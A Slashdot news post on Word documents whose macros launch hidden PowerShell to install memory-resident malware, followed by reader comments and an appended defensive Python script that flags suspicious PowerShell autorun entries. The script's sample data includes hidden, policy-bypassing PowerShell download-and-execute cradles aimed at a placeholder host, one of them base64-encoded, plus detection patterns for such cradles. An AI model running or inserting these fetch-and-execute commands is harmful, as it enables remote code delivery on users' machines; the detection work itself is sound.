
Docs With Malicious Macros Deliver Fileless Malware

itwbennett writes: Researchers from Palo Alto Networks warn that attackers are using Word documents with malicious macros and PowerShell to infect computers with fileless malware. The rogue PowerShell script performs a variety of checks on the computer aimed at finding systems that are used to conduct financial transactions and to avoid systems that belong to security researchers as well as medical and educational institutions. "Due to the target-specific details contained within the spam emails and the use of memory-resident malware, this particular campaign should be treated as a high threat," the Palo Alto researchers said in a blog post. A similar combination of PowerShell and fileless malware was observed last week by researchers from the SANS Institute's Internet Storm Center.
  • by Anonymous Coward

    Why the fuck is there a Canada flag icon for this submission?

  • by Anonymous Coward

    Sorry, if you still have this shit enabled in **2016**, you deserve the pwnag3.

    • Re:Word Macros (Score:4, Insightful)

      by Anonymous Coward on Monday March 14, 2016 @08:13PM (#51697027)

      Sorry, if you still have this shit enabled in **2016**, you deserve the pwnag3.

      There's nothing wrong with macros, per se. The problem is massive design flaws like this:

      "The documents contained macros that, if allowed to run, execute a hidden instance of powershell.exe"

      A macro should be able to perform operations on a document, but there is absolutely no reason why a macro should be able to launch an external executable file. That is stupidity at a mind boggling level.

      • by Teun ( 17872 )

        That is stupidity at a mind boggling level.

        I believe you wanted to say MS.

      • by Anonymous Coward

        If you've ever worked with VBA, you'd know that there are literally dozens, if not hundreds, of other hooks into the underlying system. The platform can manipulate sets of docs, filesystems, and retrieve data from online sources if it wants. Take away these features and I'm sure that thousands of corporate apps would quit working. It's the corporate way - allow some kind of remote automation because IT administrators are lazy. Never mind that it can't possibly be secured.

  • Get one Get Many (Score:5, Insightful)

    by rtb61 ( 674572 ) on Monday March 14, 2016 @07:57PM (#51696929) Homepage

    I got hit with a bundle of them, one after another after another, over a couple of weeks. I think I likely kept getting them because I did not read them but simply forwarded them to []. I assume, as part of their spam analysis with a view to prosecution, those went into someone's more law-focused inbox. Forwarding them on to your local authorities might not help much, but it certainly doesn't hurt and it is still more satisfying than just blocking them, and it might, just might, lead to keeping the authorities appropriately busy and a prosecution occurring; one can only hope, and a little hope is better than none at all. Oh yeah, and I most certainly do not run M$ Office - Libre Office for me, for many, many reasons, least of which those much repeated attacks.

    • So... If you're using Libre Office, you won't get pawn3d, right? Maybe they'll have a new rash of downloads now.
      • by rtb61 ( 674572 )

        Well, no, I use Libre Office because it provides all I need, they do not dick around with GUI changes to stick in patent protections to prevent competition, I do not need to relearn it every few years, to avoid document lock in, and basic is a shit macro language (I actually much preferred the program specific macros that aligned with the command structure and I feel a spread sheet is a better programming environment, it creates a better mind map of the program, different sheets, different areas in sheets,

  • Fileless? (Score:2, Interesting)

    by Anonymous Coward

    If it involves a document, how is it fileless?

  • How the fuck is this still happening? It's 2016 for Fate's sake. How many years and versions of Word/Office have we had to deal with since "Melissa"?
    • by Mogster ( 459037 )

      How the fuck is this still happening? It's 2016 for Fate's sake. How many years and versions of Word/Office have we had to deal with since "Melissa"?

      Agree entirely - the millennium called, it wants its macros back

  • What was the name of the Operating System this malicious macro malware ran on?
  • is to become a researcher...?
  • 1995 wants its News Story back.

  • Seems in cases like this where the Trojan is entirely in RAM, the best defense would be to have a RAM scanner on the hypervisor level that would scan VMs for things like this, and if found, suspend/snapshot the VM, and allow recovery via various methods (continue with the VM, shut the VM down and run a scan against the disk image, roll the VM back to a safe snapshot, etc.)

    With ransomware also a threat, having AV on the hypervisor level can likely be the best defense, especially with VM snapshots coupled wit

  • A lot of antivirus protection happens during file access, which should make "fileless" malware more difficult to detect. The article is a bit fuzzy on whether this malware is truly fileless, however, describing it as "similar" to "fileless malware" that...

    creates a registry key that launches a hidden PowerShell instance at every system start-up.

    Given that "the registry" is nothing more than a collection of files, writing a key to the registry hardly qualifies as "fileless" operation.
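The two pieces of behaviour the story and this comment describe, a hidden powershell.exe launched by a macro and a Run key that relaunches it at boot, leave a command line in the registry even when the payload itself never touches disk. The following is an added example, not code from the article, Palo Alto Networks, SANS ISC or any commenter: it takes a handful of constructed autorun entries (hypothetical value names and paths, not real indicators from the campaign), flags PowerShell command lines that use a hidden window, a skipped profile, an execution-policy bypass, an encoded command or a download cradle, and decodes `-EncodedCommand` (base64 of the UTF-16LE script) so the same rules can be run on what the encoding hides. Reading the live `HKCU\...\CurrentVersion\Run` and `HKLM\...\CurrentVersion\Run` keys is left to the caller; the tuple list stands in for an exported key.

```python
import base64
import re

# Constructed encoded payload (hypothetical). -EncodedCommand carries the
# script as UTF-16LE, base64-encoded; it is built here so the sample
# entries below are self-contained.
_CONSTRUCTED_SCRIPT = (
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')"
)
_CONSTRUCTED_ENC = base64.b64encode(
    _CONSTRUCTED_SCRIPT.encode("utf-16-le")).decode("ascii")

# Constructed sample Run-key values (hypothetical names and paths, not taken
# from the article or the campaign it describes).
SAMPLE_RUN_KEYS = [
    ("OneDrive",
     r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    ("Updater",
     'powershell.exe -NoP -W Hidden -ExecutionPolicy Bypass -Command '
     '"IEX (New-Object Net.WebClient).DownloadString(\'http://example.invalid/a\')"'),
    ("Sync",
     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -enc "
     + _CONSTRUCTED_ENC),
    ("SecurityHealth", r"C:\Windows\system32\SecurityHealthSystray.exe"),
]

# powershell.exe / pwsh, whether bare or at the end of a path.
_POWERSHELL = re.compile(r"(?:^|[\\\s])(?:powershell|pwsh)(?:\.exe)?\b", re.I)
# -e / -ec / -enc / -encodedcommand followed by a base64 blob. Prefix
# abbreviations are accepted by PowerShell, so a short match is required;
# -ep and -ex... (ExecutionPolicy) deliberately do not match.
_ENCODED = re.compile(r"-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]+)", re.I)

# Indicator name -> case-insensitive regex applied to the command line and,
# when an encoded command decodes, to the decoded script as well.
_RULES = {
    "hidden_window": re.compile(r"-w[a-z]*\s+hidden", re.I),
    "no_profile": re.compile(r"-nop[a-z]*\b", re.I),
    "exec_policy_bypass": re.compile(r"-ex[a-z]*\s+(?:bypass|unrestricted)", re.I),
    "download_cradle": re.compile(
        r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b"
        r"|invoke-expression|net\.webclient", re.I),
}


def decode_encoded_command(b64: str):
    """Return the script behind -EncodedCommand, or None if it does not decode."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_command(cmd: str) -> dict:
    """Classify one autorun command line.

    Returns is_powershell, the list of matched indicators, and the decoded
    script when an -EncodedCommand was present and valid."""
    result = {"is_powershell": bool(_POWERSHELL.search(cmd)),
              "indicators": [], "decoded": None}
    if not result["is_powershell"]:
        return result
    texts = [cmd]
    m = _ENCODED.search(cmd)
    if m:
        result["indicators"].append("encoded_command")
        decoded = decode_encoded_command(m.group(1))
        if decoded is not None:
            result["decoded"] = decoded
            texts.append(decoded)       # rules also run on what was hidden
    for name, rx in _RULES.items():
        if any(rx.search(t) for t in texts):
            result["indicators"].append(name)
    return result


def triage_run_keys(entries):
    """Return (value name, indicators) for PowerShell autoruns that trip a rule."""
    flagged = []
    for name, cmd in entries:
        r = analyze_command(cmd)
        if r["is_powershell"] and r["indicators"]:
            flagged.append((name, r["indicators"]))
    return flagged


if __name__ == "__main__":
    for name, indicators in triage_run_keys(SAMPLE_RUN_KEYS):
        print(f"{name}: {', '.join(indicators)}")
```

A plain PowerShell autorun is not flagged on its own; the rules fire on the combination of switches that a legitimate scheduled script rarely needs (hidden window, no profile, policy bypass) and on the cradle that pulls the next stage from the network, which is what makes the payload "fileless". Decoding the encoded form matters because the cradle only becomes visible after it.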
